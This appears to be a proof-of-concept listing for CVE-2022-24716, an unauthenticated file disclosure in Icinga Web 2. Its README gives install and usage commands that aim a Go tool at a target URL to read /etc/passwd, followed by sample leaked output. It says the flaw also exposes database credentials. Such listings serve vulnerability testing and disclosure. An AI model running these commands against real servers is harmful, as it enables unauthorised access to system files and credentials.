CVE-2022-24716 PoC — Path traversal in Icinga Web 2

Source

Associated Vulnerability

Description

CVE-2022-24716 (Arbitrary File Disclosure Icingaweb2)

Readme

# CVE-2022-24716

<p align="left">
	<a href="https://go.dev/"><img src="https://img.shields.io/badge/made%20with-Golang-blue"></a>
	<a href="#"><img src="https://img.shields.io/badge/platform-osx%2Flinux%2Fwindows-blueviolet"></a>
</p>

Icinga Web 2 is an open source monitoring web interface, framework and command line interface. Unauthenticated users can leak the contents of user-accessible local system files from the web server, including `icingaweb2` configuration files with database credentials.

- [Installation](#installation)
- [Usage](#usage)
- [Running CVE-2022-24716](#running-cve-2022-24716)


# Installation

CVE-2022-24716 requires **golang** and to download it just use:

```sh
go install -v github.com/joaoviictorti/CVE-2022-24716@latest
```

# Usage

```sh
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd 
go run .\CVE-2022-24716.go -u http://localhost -f /etc/passwd -p http://127.0.0.1:8080
```
This will display help for the tool. Here are all the switches it supports:
```yaml
usage: CVE-2022-24716 [-h|--help] -u|--url "<value>" -f|--file "<value>"
                      [-p|--proxy "<value>"]

                      CVE-2022-24716 - Arbitrary File Disclosure

Arguments:

  -h  --help   Print help information
  -u  --url    Insert url
  -f  --file   Insert file
  -p  --proxy  Insert proxy
```

# Running CVE-2022-24716

```console
go run .\CVE-2022-24716.go -u http://icinga.cerberus.local:8080 -f /etc/passwd  

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
......
```

File Snapshot

 [4.0K]  /data/pocs/dc6afcf04f8ce206a90ab988c5d1987b72010196
├── [2.2K]  CVE-2022-24716.go
├── [ 152]  go.mod
├── [ 418]  go.sum
└── [1.5K]  README.md

1 directory, 4 files

Remarks